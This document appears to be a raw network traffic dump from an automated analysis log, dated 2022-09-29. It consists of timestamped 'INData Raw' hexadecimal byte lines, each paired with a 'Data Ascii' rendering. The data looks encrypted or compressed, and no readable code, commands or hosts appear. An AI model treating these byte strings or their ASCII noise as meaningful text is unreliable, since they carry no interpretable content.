                                                                                                                                                            2022-09-29 12:45:13 UTC16734INData Raw: 99 44 ec ef 0b d1 ae 16 87 25 84 56 44 7f 67 0b 11 20 f3 f9 db 42 4d f6 fb 0c e0 6f 2e e7 e6 ec 26 5c 8f 3e 85 b3 d4 1e 2b 03 4d 96 9c 98 9d 59 d8 ef 6c 5e a9 0b 22 14 43 db 92 66 76 70 19 9b 77 16 26 1a ba ce 82 4d c2 5d e1 dd f1 32 f2 54 52 31 13 71 16 0f f6 77 38 0e 5b aa c3 dd cb 19 6e 06 cb 5c f1 93 18 d1 4d cc 6e cd 01 79 2f 89 ce ed b8 e4 6d 53 21 fb bd 36 23 49 d7 ae 60 28 8a 56 97 15 5e 54 a9 c2 b0 3d 0a a4 11 ae c1 68 9c 5e 37 4f 3f 5e ff 06 79 ec aa f3 d1 7c ff 00 f1 70 33 19 c6 2a d5 92 84 05 9d c1 fe cd e4 88 2e 07 26 64 dd c1 4d 63 9f 61 03 8a e8 63 44 e5 e1 24 66 99 96 aa 3e 5b 48 54 b5 57 10 ab 6f 1f 0e 42 0b 2c e3 16 48 6b 03 4f f2 4c 21 b6 83 8f f3 26 a2 84 57 30 87 95 15 77 b4 6e a7 95 45 71 db eb 6c 27 62 90 c8 fc ea 14 12 e3 7b 6a 28
                                                                                                                                                            Data Ascii: D%VDg BMo.&\>+MYl^"Cfvpw&M]2TR1qw8[n\Mny/mS!6#I`(V^T=h^7O?^y|p3*.&dMcacD$f>[HTWoB,HkOL!&W0wnEql'b{j(
                                                                                                                                                            2022-09-29 12:45:13 UTC16750INData Raw: 01 8b 9e c1 04 da f1 a7 71 84 0e 3b a8 a8 12 22 13 07 92 bd 5d 4e 88 5c 43 ed e1 6e b8 d3 17 6e 2a 0b 1b 85 ec 71 14 af b2 f5 2e fe 0d e6 87 ee 41 20 18 e2 ac 77 fe 94 dc 28 2c f2 a1 2a 94 92 6d 0a f5 d7 2f c2 be 34 60 41 89 48 dc 77 9c b0 e7 72 18 88 d2 88 a3 de 12 05 a9 1f 1d d4 97 79 83 ce b1 bd 5f 8a 01 cb cc c0 9e 16 27 4a c8 fc 67 b4 11 df 57 dd 9b 37 65 cb 5d 24 58 e6 a7 9d 83 2c 90 7f ff 56 a4 a8 54 04 8a 20 13 04 70 ff 40 40 33 8d 84 2c 44 ed ff 73 7c d9 ce cb ce 84 82 ac a2 fb 44 b2 eb fc b3 b5 13 9d de 31 1a 65 47 f6 86 47 0d 71 6a 30 43 2e 68 6f 58 c5 44 24 71 d1 ac ff 9f 35 7e 85 95 38 99 c3 a3 38 29 de 6a bd 9e 3b ad 3b fd e9 84 e4 50 0a 17 52 48 1d 97 1e fc 03 98 99 99 a9 4f d4 28 5b 9c e7 43 03 b7 40 4b 7a ce 25 09 a2 f6 b3 93 d9 85 39 6c
                                                                                                                                                            Data Ascii: q;"]N\Cnn*q.A w(,*m/4`AHwry_'JgW7e]$X,VT p@@3,Ds|D1eGGqj0C.hoXD$q5~88)j;;PRHO([C@Kz%9l
                                                                                                                                                            2022-09-29 12:45:13 UTC16766INData Raw: 3e 6a 48 ed c8 b2 08 72 a6 6e 2a 9b 68 0f a5 05 2f 14 3e 09 2b ed 98 53 97 e1 68 99 c5 8b 3b 52 dd ea 5d 48 76 c1 69 1d 9c 3f 7b 32 93 4c 41 08 3b ed 65 ec d2 ca 24 7e 6f 54 d3 c2 72 4c 0f e4 b7 f7 f7 a0 66 5b 51 ac d4 3a 39 56 d2 3f 46 f2 41 c2 38 f2 d9 ea 95 19 e4 8d 06 93 83 ab 80 5d b3 40 dd 50 67 ca fe b7 9c 10 26 2e b4 8e 63 92 d9 7d 68 38 23 c8 c8 ce c9 b5 f0 7c 16 dd 18 f1 35 80 e5 8e c4 bd d1 8e 10 41 54 a0 0f c0 d2 c7 11 ab 8e fa e5 6d e1 08 64 14 b9 26 b9 01 82 43 da 3b 4d 84 52 13 20 4e 46 52 79 2a 72 f0 9f dd 1c 6c af 96 dd 12 fc 8b 6c 22 23 42 16 96 7e 8c 8f 9c ff 3c 72 bd 38 ea 3e 22 c2 0d a7 2c e1 49 3c 47 e7 ad 26 68 95 b4 a7 d0 92 5f f1 4f 84 15 96 ec 38 7b 25 c1 21 64 25 6b 50 12 54 3d 07 1b 01 9a ab ca 2a bb 7a 75 3b d6 9f c9 b7 2c 37
                                                                                                                                                            Data Ascii: >jHrn*h/>+Sh;R]Hvi?{2LA;e$~oTrLf[Q:9V?FA8]@Pg&.c}h8#|5ATmd&C;MR NFRy*rll"#B~<r8>",I<G&h_O8{%!d%kPT=*zu;,7
                                                                                                                                                            2022-09-29 12:45:13 UTC16776INData Raw: 8c 1b eb 2d 22 98 d2 c0 a8 5f 6c 05 8c 9f 6a a1 26 b6 e3 0d 44 32 dd b6 a4 5e 29 ab 7f d3 81 40 aa ba f7 3c de 17 93 53 75 71 d9 97 3e 3d 3c a4 82 2d bc 0a 8a 2d 4d 70 36 84 5e 97 d5 6b d9 1c 19 83 02 15 73 05 72 2e 9f 3e e3 6b 70 ea f0 12 00 47 e9 11 42 df 13 ad 52 39 d7 61 cd 2b 83 55 43 b8 73 85 8a 4b 96 fe 1d 94 cb 90 0f d4 9a ff 78 de 38 98 58 30 5c 1e ae a8 bb c5 91 2e 43 1e 73 c3 5e 6f 18 da 57 46 ee 37 e3 37 fb 69 41 e7 db b1 ea 25 0b 63 82 64 2b 64 35 39 e2 b7 38 ed a2 f3 02 85 c1 0f 9f d5 01 b0 da 6c 2a 82 fc a7 1d 49 99 f9 7d 88 9b d7 3d 3d 79 39 2d c6 3b f6 f8 93 36 94 26 e8 4a 55 fc ff b3 e7 f2 a3 a5 d4 be 9b 69 c1 6b 08 5d c0 44 30 7e a6 91 03 37 49 f1 68 c2 36 29 bc 6a 30 37 ed fe 4f a9 67 12 8f 36 d7 f1 24 f3 70 a3 18 9f 15 2c e5 dc 72 3c
                                                                                                                                                            Data Ascii: -"_lj&D2^)@<Suq>=<--Mp6^ksr.>kpGBR9a+UCsKx8X0\.Cs^oWF77iA%cd+d598l*I}==y9-;6&JUik]D0~7Ih6)j07Og6$p,r<
                                                                                                                                                            2022-09-29 12:45:13 UTC16792INData Raw: d2 dd b3 c7 e0 99 18 a0 4e 5a a8 ef 29 7a d8 1d ab a7 02 45 fa 02 79 9f c8 02 06 ad 26 88 ba ea ff 7a 99 8d 4b 9f c1 e9 f2 70 b1 cc 40 0f d8 11 3a 15 db cf 12 4f b5 6b dc 3f 06 00 51 ca 53 f6 11 2a 08 8a a1 00 b9 a6 02 e4 38 57 1d ba 49 47 b3 ce 16 7e 1e 20 47 ad ef 5a c0 47 fb fd 66 18 01 f3 b3 8f 8f 83 a4 0a 43 0e a6 07 2f 29 44 4c 90 77 1e 40 25 54 e2 35 8a 11 15 3c 0f 34 83 ad 40 e9 be 79 10 ef 48 ff 02 5f f1 3e 2f c5 1a 6d 4c cd 92 98 e4 42 36 33 d8 3f 8a b8 14 1b 5b 83 d7 01 d7 34 7b 81 6b 92 7d af 29 3d da f9 d3 d3 3e 0a 8f fb a7 fd 7b 06 a3 4b f4 58 3b be 7b c0 ea 5d 94 49 ec 28 6a 8f 91 bf cd 9c cf 72 51 6a 1a e1 09 a9 1c 03 42 af 5f 03 f5 a3 f8 36 48 a3 bb 90 8c d1 74 b0 f1 58 75 16 65 55 4e 2d 3b f0 71 55 57 d7 c1 c3 ab 23 61 3e 49 a3 6f 44 c4
                                                                                                                                                            Data Ascii: NZ)zEy&zKp@:Ok?QS*8WIG~ GZGfC/)DLw@%T5<4@yH_>/mLB63?[4{k})=>{KX;{]I(jrQjB_6HtXueUN-;qUW#a>IoD
                                                                                                                                                            2022-09-29 12:45:13 UTC16808INData Raw: 70 0e 3c 40 fc e4 ab 5e a3 6c 0e 2d 42 d2 7f 67 a5 24 2a 3f 7c 1f f9 87 29 05 5c 48 a3 65 b6 29 9d 3f 61 0c cc f5 57 36 bc 5c 80 b3 49 45 3c 46 33 a4 a5 6f 71 d3 89 7d 82 45 e0 68 68 d8 83 c8 98 a5 a6 49 cd 2a 8e 8b 12 23 03 f9 1b b9 ac 19 3d f4 41 25 23 3d e5 90 1b fb 17 ac 9f 8a d3 14 9b c7 6c 9e c8 09 b9 d2 f7 59 b3 7c 6b 96 ec 61 fc 7f 8e cc 4f f7 03 e6 9d 10 b8 1b bd 5a 7a 69 70 e2 ef 93 fb fc 62 66 ba 81 a2 c3 e4 7c a2 01 a1 91 b4 c1 c1 81 98 e6 2d 2d 5b a5 ab aa 3f 8f 8d 92 5b 93 c0 05 04 04 13 21 fc 0a 95 63 20 6f dd d4 8b 87 2c 23 25 be 3b 44 25 1c 25 54 3a b5 02 eb 1c 24 bd ba 72 d1 53 06 f6 4f 7d 85 9d 39 54 e3 01 ac 42 3a 0a 3f 7f 43 7b 59 0f 08 20 c2 3a d1 51 31 6c 75 80 bb 9c bc d8 2c 8e a7 cc a0 2a a2 d6 53 4b bd 05 d6 47 05 b2 93 69 32 0d
                                                                                                                                                            Data Ascii: p<@^l-Bg$*?|)\He)?aW6\IE<F3oq}EhhI*#=A%#=lY|kaOZzipbf|--[?[!c o,#%;D%%T:$rSO}9TB:?C{Y :Q1lu,*SKGi2
                                                                                                                                                            2022-09-29 12:45:13 UTC16824INData Raw: 9a f3 b0 0c 57 9c 62 0d 64 55 2e 03 e5 6a 2d 6e 25 e4 a5 41 b5 c6 45 85 33 3d 94 e6 61 8d ce bd 87 7c 7b 58 7f 50 6d ba ed c9 3b e9 c9 c6 69 3d 19 6b 5a 69 68 cd 66 09 1a 78 f7 3a e8 d7 89 40 2b 81 37 2c 1f 5b 30 99 be f7 2c cf bb d6 b9 0d 23 d6 76 89 08 e5 da 2b e1 e2 2f 93 a7 0e bb 73 0c d5 f6 94 9b 1a cd ad 46 76 1a 82 78 48 15 72 6f a5 ea f4 ef b3 e6 55 bf a1 c6 e3 95 b7 e5 04 85 8b 14 3e 9a a6 52 1f f6 a2 fe 79 f5 0e cf f1 51 64 d0 7c 5f f2 30 c6 ed 44 79 08 9a d5 4e 51 05 ff 7a 44 31 82 cc 0e 31 0d a3 a0 66 9b e8 51 bd cd 8b 87 78 a7 f9 c0 a6 60 07 e9 7f 97 ed 22 60 a6 cb 6d a8 37 2e 7b 35 77 94 76 78 02 14 5c 45 e9 5b 54 b5 28 14 43 a8 74 d5 9f aa b3 08 04 fe 1a 98 98 0c 79 4d 4c ed 99 f9 ed f7 48 30 05 95 8c 67 a5 a2 c2 6a ef 71 4e 7e 16 55 98 f2
                                                                                                                                                            Data Ascii: WbdU.j-n%AE3=a|{XPm;i=kZihfx:@+7,[0,#v+/sFvxHroU>RyQd|_0DyNQzD11fQx`"`m7.{5wvx\E[T(CtyMLH0gjqN~U
                                                                                                                                                            2022-09-29 12:45:13 UTC16840INData Raw: 88 bf c4 54 ab 6a 9e 2c 0c cc c0 29 ca f3 da b5 75 77 e1 4e f9 c0 11 d5 f5 73 6a bf 33 8b 89 7a 62 da fa ed ab 75 ef 31 e5 f9 05 82 6d bd a7 73 83 70 b3 c1 84 8b 5f 4f dd d7 89 80 9d 23 97 36 b1 3e 93 9e 0f 53 ea 3c 86 81 9f 19 0a b9 88 56 68 cb 46 64 8e 61 db dc 61 ed b9 ce c9 58 d6 eb d3 79 ed af ce 7d 3b 83 99 51 37 20 e7 69 b3 3f 31 e5 e9 07 9a 01 41 78 36 7b f5 64 26 12 a8 94 72 1d 70 df 0a 07 1f 0c 31 78 26 84 dc 85 62 de 2e 7b c0 d2 a4 4f 07 33 fc 42 1d 2c 71 34 cb 58 a2 3f 86 50 d8 26 e6 08 22 2d 6e cc 2e 5d 3f bd c4 9d 50 4e 94 4e be 73 d7 26 33 c9 80 8c 2c 04 6d 67 0b 8d 06 9f 62 98 c5 6b db a9 73 3f dd 1a 59 90 8d b2 6f df b9 62 63 cf 97 9b 22 a6 78 15 97 9b ec ff 91 89 08 52 e1 52 ad db 1d 35 6c da 16 4f 34 e1 5c 3e 49 63 38 4d 2d ae 43 cf 14
                                                                                                                                                            Data Ascii: Tj,)uwNsj3zbu1msp_O#6>S<VhFdaaXy};Q7 i?1Ax6{d&rp1x&b.{O3B,q4X?P&"-n.]?PNNs&3,mgbks?Yobc"xRR5lO4\>Ic8M-C
                                                                                                                                                            2022-09-29 12:45:13 UTC16856INData Raw: a6 45 b3 ad 9e 56 07 3d 37 76 f1 16 cf 4a 3f 59 96 a5 68 9b 37 75 9c ed e6 f7 dd 78 1d 72 3f 6e 87 e9 08 67 1b 5b c3 36 e8 cc ad 91 63 55 ec ef 9b 02 61 40 ac 0b de fd 89 56 7c 0f b5 6c 13 12 7e 35 1d f3 0b ad 13 11 a3 4c 95 f9 a1 1e 0e e3 59 f2 1c 38 25 66 ec fd 26 ff 5a b8 5e 5e 1c d4 72 aa c7 32 fd 78 0a fe da 4f fa 47 d4 bc 16 5c 11 3b b7 29 f0 bd 29 f2 e2 98 8b 2f eb 5d b8 d0 68 51 59 e9 68 52 79 6d 85 2d 5f 67 81 07 b7 24 1d bf e3 fe 3b 45 75 1d 4c 98 9c c3 8d f3 91 62 71 12 3c a3 64 e2 d9 7c fb 81 35 87 5b 89 e2 b4 0e fb 5c 61 98 b9 9c ec 80 e0 6e 8e 0e 3b 6f 0c 47 49 41 42 8f 1f 32 27 f1 33 1d 15 31 48 83 42 12 6b 9b 42 e6 32 72 3e 62 13 d1 cf 78 d1 ab 93 b9 30 84 d9 80 df fb c4 5d 42 9d 72 b4 44 e4 34 8d ce 07 66 9b fe 42 2c ec 16 e9 36 f4 88 a9
                                                                                                                                                            Data Ascii: EV=7vJ?Yh7uxr?ng[6cUa@V|l~5LY8%f&Z^^r2xOG\;))/]hQYhRym-_g$;EuLbq<d|5[\an;oGIAB2'31HBkB2r>bx0]BrD4fB,6
                                                                                                                                                            2022-09-29 12:45:13 UTC16872INData Raw: c5 4d 54 69 a0 70 a9 bc 7d f0 38 58 22 e1 29 c3 b6 21 8f 69 ca c5 b3 30 e3 b0 29 28 a6 d9 35 ce a0 b6 9d a4 35 02 a6 5d 77 8f cd 1e c6 0f d2 48 4d 1f bb 24 97 85 2b fd da ea 47 6a 85 50 8f 6d 44 16 a6 00 5a 51 89 b3 ff ab b3 16 0c c7 32 63 ce a1 be ff 86 2d 98 59 01 8d 7f d7 f9 e3 4e 04 97 6d 75 d9 f3 81 6f b1 d1 18 4c 1d 91 4e 49 f8 3b 7c d8 08 4d c9 6b 20 c8 d4 26 14 46 7d 4f c7 45 1a 46 ab 3f 1a 9f 31 fd f3 e5 c7 49 9a 7a 2b b9 a7 5a 75 70 4e 31 c2 39 fe de 9f 9b d5 35 69 18 dc ca 2b 85 7e 26 16 86 40 79 c2 b7 d2 30 05 cb 99 7d 3b 7c 2e 48 f3 df 29 ab ab c4 c2 3b 80 f0 26 e2 09 b4 41 fc 39 73 46 b6 50 c9 9b 57 6c eb ce b7 8e b1 32 6f c8 4e 75 64 60 d9 95 bd 42 cb 72 1d 6d d2 62 24 2c d5 b1 f3 71 4c 7f 84 99 73 42 5d 30 77 b5 bb f0 fb dd 4a 0e ce db 22
                                                                                                                                                            Data Ascii: MTip}8X")!i0)(55]wHM$+GjPmDZQ2c-YNmuoLNI;|Mk &F}OEF?1Iz+ZupN195i+~&@y0};|.H);&A9sFPWl2oNud`Brmb$,qLsB]0wJ"
                                                                                                                                                            2022-09-29 12:45:13 UTC16888INData Raw: 40 f5 fd b1 5f d6 6b 73 84 11 98 4c 90 6b f3 9e e7 27 78 5f f3 d7 13 c5 82 d6 09 eb 4a 19 a8 c1 66 d4 c1 ac e4 63 5a e3 83 45 37 73 a5 51 75 1d 3e ca 24 63 7a 5d 6c 2a 10 60 94 72 b3 87 5b d8 3b 19 fe e7 bd e0 ba 58 65 23 b2 6f 43 8c 2d 28 d5 6b 3b c0 06 30 99 3a 0d f1 53 7b e8 cc 3a e9 f5 18 34 2e 16 2a 50 ff 4e a1 d1 91 d0 b7 63 47 f8 54 ed ed 50 71 47 cf cd e9 5e 93 36 ea 28 ea bb 26 14 52 b4 be e1 1c ac a3 2f 9b 84 ed 79 cd a5 fa e8 b1 e6 45 e5 73 21 0b aa 39 43 de c6 27 e1 50 8b ae a8 56 9e d6 23 52 08 4c 44 05 2f ad ad 19 84 9c 06 2d 28 57 aa 7a 7f b2 12 e4 c4 4f 84 e3 f8 d5 2c b4 20 f6 33 bd e6 f9 0d c9 c5 2b 75 00 66 d0 25 dc 63 ce e3 6e 87 2e 3c f4 db 6c fc f4 14 fd 55 28 27 e2 0d e9 fb cb 2d 7b cd bc 81 54 03 76 c1 13 71 d2 f4 d1 6a 21 f2 44 fc
                                                                                                                                                            Data Ascii: @_ksLk'x_JfcZE7sQu>$cz]l*`r[;Xe#oC-(k;0:S{:4.*PNcGTPqG^6(&R/yEs!9C'PV#RLD/-(WzO, 3+uf%cn.<lU('-{Tvqj!D
                                                                                                                                                            2022-09-29 12:45:13 UTC16904INData Raw: 70 f9 18 94 b1 93 f1 21 2e d0 eb 82 46 7e 5d 1c 28 42 4a 16 77 72 a5 9d b5 18 f4 30 55 49 1e 73 77 2b 9a 0b b8 a3 01 11 e5 d4 3b 44 12 81 30 4a ed 5a 67 cb 5e c5 73 41 da 65 16 a3 fe cb f9 dd 17 cd 5f 22 c4 40 cf da ae b0 4b 6f 00 61 24 a4 e5 bb 35 0d 23 e3 3b 9e 58 c4 c6 1c 10 b8 72 40 55 2f aa f4 13 62 ff d5 3b 9c 31 9b d8 6d ed f4 ff 2c 01 49 4b f1 bd 7c 8f 2d 3b bf 8e 9c 9a 5b 22 74 99 67 8b 94 be d6 cf c2 8d 94 ec fd d1 ef 56 2d 30 4f 0d ba d8 44 7f ca a3 af 88 d1 fc 20 43 1c 22 1a 79 4c 4f 5d 8d b5 6d 91 3d 7b 5e 62 57 88 2b 43 65 a4 b3 36 21 1e bd 85 29 3d c2 2c 79 35 c6 ac 67 0a cc 72 78 3c eb 19 76 61 1d 9f f3 40 6f e3 5c 5f 9c de 93 96 db aa 77 d4 86 37 f1 a9 65 35 a8 a8 77 d1 b1 90 44 84 06 e3 86 f2 72 0d e7 e7 70 a6 b8 ba 68 9b 97 0a f2 d8 f3
                                                                                                                                                            Data Ascii: p!.F~](BJwr0UIsw+;D0JZg^sAe_"@Koa$5#;Xr@U/b;1m,IK|-;["tgV-0OD C"yLO]m={^bW+Ce6!)=,y5grx<va@o\_w7e5wDrph
                                                                                                                                                            2022-09-29 12:45:13 UTC16920INData Raw: 1d 7c 40 e3 7f e5 33 b4 82 a8 be 85 aa ea 43 a2 8f 12 48 3b 2d 27 82 c9 eb ca d4 4f 2d 26 64 d3 1a bd 5e d2 72 e7 15 4d 95 c2 f8 27 32 21 2d 39 2f da fa a5 6c fb da 47 2d 1e 3e 4e 41 14 eb e8 ef 32 8a 4c 7e 2b aa 00 9e 29 2a 99 fc f8 e6 0f 64 b8 e7 34 00 71 54 b6 3b 79 2c e0 15 a2 41 a7 d9 f0 ac cc 63 e7 32 c2 c3 3f 64 dc ca 6f 6c b3 f2 29 c5 b3 d0 5c 9d 60 03 e5 6d b4 42 3c ed 51 46 a7 2d 62 3d 71 f3 54 5a 7a 73 e9 17 62 14 c6 22 7a 9b 4f ba 7c bf ab ed 69 9d 12 52 df b1 6b 79 b0 78 f8 4a c3 e7 4a 68 b2 68 d7 69 03 51 5b 90 35 9f 5e 9f f1 de b4 73 d6 e4 5d 6b 29 a2 61 17 85 a4 f6 9f 82 dd a4 9b c9 17 f3 ec 91 ea 5a 4f 08 04 d7 f0 80 15 c4 c2 6d de d4 83 78 7f e2 90 cc e8 98 b4 51 5f 11 7a e4 db 3f 83 a5 cf dc 9c 3e f0 89 1a b1 bd 84 91 01 6e cc a4 ed 01
                                                                                                                                                            Data Ascii: |@3CH;-'O-&d^rM'2!-9/lG->NA2L~+)*d4qT;y,Ac2?dol)\`mB<QF-b=qTZzsb"zO|iRkyxJJhhiQ[5^s]k)aZOmxQ_z?>n
                                                                                                                                                            2022-09-29 12:45:13 UTC16936INData Raw: 11 4f 4f bb be 02 6b 3e 9d 1b 8b 56 e1 01 55 31 b7 2e a2 76 97 63 c3 55 a6 e3 6f 8b 16 a2 36 9b 08 6b c2 86 94 98 fe e6 c7 dd 3c 5d 74 67 81 0a f9 53 8f f0 33 68 44 b7 7e 7f 88 7a 7b b0 b6 b6 53 93 e3 d4 80 5a 6b 30 8a cc 82 6e 42 45 95 b9 87 ad 38 59 c8 26 bf 3a fb a7 5e 31 17 6f 12 7a a2 11 c1 ca f3 42 6f 9e d6 f1 8d 23 e1 e7 8a 86 08 3c a3 8d 55 65 eb 07 d9 16 d2 cc 15 1f 17 80 ca 9e d7 85 7e f1 07 21 c7 67 bd d1 bc 8e a2 cf 4a 65 cd 05 04 38 d0 8e c2 b5 cd 8b 41 aa 1c dd 66 98 0b b8 e6 a4 f0 00 3f 05 8a a4 3a 51 f0 5e 7d 3b 54 d9 3f d3 56 e6 ef 8a ac 26 6d 76 36 be be a2 df 3d ab 7c bb da 7d c1 ee 97 3a 07 f1 ca b3 d6 fb 55 b5 66 f1 eb b1 4a 77 61 df 9c 2c cc 43 00 3b 8c ec be 40 9a 3b de 08 28 a9 42 37 63 dd 89 84 b7 02 5b f5 18 67 6c 7c 0a c7 c2 c9
                                                                                                                                                            Data Ascii: OOk>VU1.vcUo6k<]tgS3hD~z{SZk0nBE8Y&:^1ozBo#<Ue~!gJe8Af?:Q^};T?V&mv6=|}:UfJwa,C;@;(B7c[gl|
                                                                                                                                                            2022-09-29 12:45:13 UTC16952INData Raw: 3f 4b d0 0f 26 29 c6 f5 9d d0 94 92 5f 72 a5 4f 3d 7a 8b fe 0a 9d 3a 1a 05 cb b4 c4 9d b5 70 a5 cc 44 fd 74 fc 6e 4e 2a a0 34 0a 13 01 b6 88 ad 8a c0 c9 87 b6 a5 78 5a c8 9a 72 33 e8 fa 39 1c de f5 91 cb 91 44 84 1a 1b 8f cc a1 ee f5 be a3 d3 fe 6c 4e 8e 11 f0 fe ca 75 b7 5f e5 23 14 d1 66 62 36 bc e3 72 84 35 87 f2 15 a3 e2 cf 1e 71 8f ee 95 d8 92 1a ff a6 a6 16 d0 c4 3d 90 5d 85 1e 2a 33 1f 61 93 cc 9a 18 e4 6f ca d7 5c 0e 2c 42 b5 fb c4 55 4f e9 98 be f1 ee 97 ad ae 2b f2 90 72 66 83 cf 88 a4 5d 0c ca ea 31 0b 00 8e e8 ea 42 9f b8 77 4d 81 96 ee ad 89 5b f1 87 c4 a2 85 8b 80 9d 84 71 30 24 e7 f0 38 2a 40 3f f0 93 b2 e0 52 b2 03 58 12 c1 7c 9a 79 25 0d 7d f4 15 d2 29 1f 07 f0 3d d3 d5 12 2e a4 c3 66 38 f5 cf 75 03 29 94 3a b3 67 28 c6 ea 52 ea 62 93 9d
                                                                                                                                                            Data Ascii: ?K&)_rO=z:pDtnN*4xZr39DlNu_#fb6r5q=]*3ao\,BUO+rf]1BwM[q0$8*@?RX|y%})=.f8u):g(Rb
                                                                                                                                                            2022-09-29 12:45:13 UTC16968INData Raw: 08 30 d0 98 25 68 2b fe 26 c5 74 a4 c9 be b4 92 08 8e a7 dc 55 70 89 c8 c3 b9 15 c5 2c 43 f0 01 d9 0b fd ad 39 70 f1 c8 6d ec 19 c7 4e 07 69 69 3e 23 c0 7e 43 fd ec 6e 84 1e c6 ab d2 25 96 34 da 0e 92 93 d6 2c 0f 89 85 cf 5c bb 35 9c eb a8 25 a2 60 a6 88 78 b7 9e 03 86 66 91 d6 5e 2c b8 ad ea cd d3 55 73 72 5e 5b 12 97 e3 77 8b 1c 4e b7 21 4a 62 20 42 95 2a 5e 87 7a 4f 70 df cb 3a e9 c8 84 f1 5b 8d ba 91 d3 4f 12 9a 53 7e a5 27 92 c4 ac b8 58 f6 0b 13 c0 d9 33 9e 9f c9 bd 8e 22 bc a2 a1 44 69 c8 5c 31 a1 87 2f e4 e0 ac fb 1e 1b 34 2f 2b 66 0c 3a c9 53 1c 02 14 21 2a 54 62 d1 4d 7b cc 73 0c 7c 71 49 4b e9 46 34 ca 35 6d 98 1a d6 36 a6 7a 7e f7 0d 6f b6 e8 53 f4 5f a4 95 ea e1 7a 62 1c 9c 81 79 81 c7 70 b3 95 37 41 20 80 d1 95 20 df 11 ea 78 bd 25 f3 31 e6
                                                                                                                                                            Data Ascii: 0%h+&tUp,C9pmNii>#~Cn%4,\5%`xf^,Usr^[wN!Jb B*^zOp:[OS~'X3"Di\1/4/+f:S!*TbM{s|qIKF45m6z~oS_zbyp7A x%1
                                                                                                                                                            2022-09-29 12:45:13 UTC16984INData Raw: 6a 85 ee 0b 9e 1f 2c 71 c5 59 ee e8 22 96 81 da a9 6e e4 0a ab b9 85 a0 0f 2b 5f 59 0e b3 f8 b3 89 96 08 44 72 20 01 f2 ac b8 ab 80 c1 0f 22 f5 70 26 0f 24 6d d3 4d 1b fd b3 29 61 1c 3a a5 40 c2 14 d9 13 e1 85 47 7e 69 c0 4a 80 7c 80 de 5d 06 1b 04 40 9f 8d da 77 9b b8 65 d5 ea 0a 4d 3b 99 6b 9a e5 29 3d d2 cb b4 55 4f f6 9c 92 e4 4e b7 77 ab be fb e7 e2 09 6e a2 a3 fd fd f0 35 94 c6 30 48 51 07 e1 ad 52 3c 72 52 62 26 91 cd b0 43 db ae f8 66 be e9 e2 05 aa 4b f4 47 dd e4 5e 54 02 2d 3f ff b9 37 86 88 09 b2 38 a6 67 88 bd eb 01 8b a0 ce c8 bd 41 4f c6 79 2c b6 6e 94 46 5f 79 c1 26 61 c8 d5 ef a3 04 20 70 f7 57 58 cb fc f3 0e ae 9d 7b 07 ac 4e c8 b6 ff 4d eb e7 9b 28 fe 7a ef 2d bb 7d d7 fc 4a 73 bf 03 a2 50 c0 3e 2b b7 cd 13 39 cd 13 ed 08 cf ff e2 a3 ef
                                                                                                                                                            Data Ascii: j,qY"n+_YDr "p&$mM)a:@G~iJ|]@weM;k)=UONwn50HQR<rRb&CfKG^T-?78gAOy,nF_y&a pWX{NM(z-}JsP>+9
                                                                                                                                                            2022-09-29 12:45:13 UTC17000INData Raw: 31 15 bf b4 7f a4 bd b4 5e 63 5a 61 07 7c b4 b4 9a 40 48 ad c1 17 ab 11 41 64 34 78 81 80 78 ad 42 f0 d8 dc c9 51 30 66 1d f0 a6 0b 4b af c5 df 71 8c 75 c7 78 6f 3a e3 90 1a 60 7e a8 76 64 c6 9d 95 a2 c1 06 e7 bb 86 c0 01 80 53 4f 01 29 ca d0 03 83 c0 52 53 7b 05 75 a0 ca 45 b0 22 95 da 40 d8 78 38 d3 bc 4d 43 96 3f 89 36 04 bb 27 bc 38 d8 a5 3f 66 31 7f 24 84 46 ba 8b 6a 8d 63 3f 48 bb 57 29 72 f1 03 bf 8a 53 3b a9 05 e1 e3 51 e4 db f1 b5 81 0c 46 4e 07 dc 97 17 0e 5d 63 90 ef 74 3f 6c 75 23 ab cb b4 bd 0b 2a f3 5c 93 fa a2 73 67 8a 86 8f 96 80 b0 75 5f 30 48 e7 8c 26 a7 47 00 fc 9b a0 a5 56 5f 4d b4 30 49 c5 b6 b7 98 df 59 8f ca e3 68 8e 32 a6 15 bc f2 71 6b 44 f4 7f 1d 96 e1 34 bb ac b0 f4 00 d0 5f 77 ba c3 e6 98 0e ef f2 d2 78 38 73 a2 99 46 96 5c 32
                                                                                                                                                            Data Ascii: 1^cZa|@HAd4xxBQ0fKquxo:`~vdSO)RS{uE"@x8MC?6'8?f1$Fjc?HW)rS;QFN]ct?lu#*\sgu_0H&GV_M0IYh2qkD4_wx8sF\2
                                                                                                                                                            2022-09-29 12:45:13 UTC17016INData Raw: 8a 2d 8f 68 84 84 cb f7 df 53 3a 8c 56 e7 54 69 e3 23 c1 bf c3 78 21 7e 71 dd 51 0e 44 6f b5 62 c7 07 4a 96 84 61 21 ce 20 3e 55 ed b6 11 01 d1 4f be 56 27 e9 6b 1d c6 80 17 a0 97 c0 92 51 ba f3 a9 99 4f b3 37 46 a7 5a e9 78 4c 6a c8 d3 0f 74 ac 8b 21 77 a0 c8 34 f4 5c e2 45 c7 35 07 4b 35 0c 19 78 a9 50 7d bd 60 d5 a8 58 a2 d5 98 33 81 56 26 0e bf fd 91 de fe d1 e5 ec a1 08 f4 dc b0 df d9 2b c8 45 9e 04 a7 5b d0 19 43 fd 4a ac a3 ee 60 04 e2 ca 4f 3d b0 41 da 25 ab e0 f2 b1 67 56 72 52 36 38 d7 c0 ef cd 06 a9 a7 e6 00 d9 06 6e 4a 43 4d a3 da ba 8e b1 5c 8e e0 80 4a 37 92 2d 31 a2 5f f0 3b c5 9d ca 02 9b 8c 2b d1 74 1b b0 bd d2 55 42 6b d5 b5 ba f9 a7 bf b2 eb d3 3c 2a 24 c6 4e 8b ab b4 e7 a6 d2 98 60 ce 44 7a 24 2c 06 96 4b 01 43 1d e7 7d 97 a6 13 93 1a
                                                                                                                                                            Data Ascii: -hS:VTi#x!~qQDobJa! >UOV'kQO7FZxLjt!w4\E5K5xP}`X3V&+E[CJ`O=A%gVrR68nJCM\J7-1_;+tUBk<*$N`Dz$,KC}
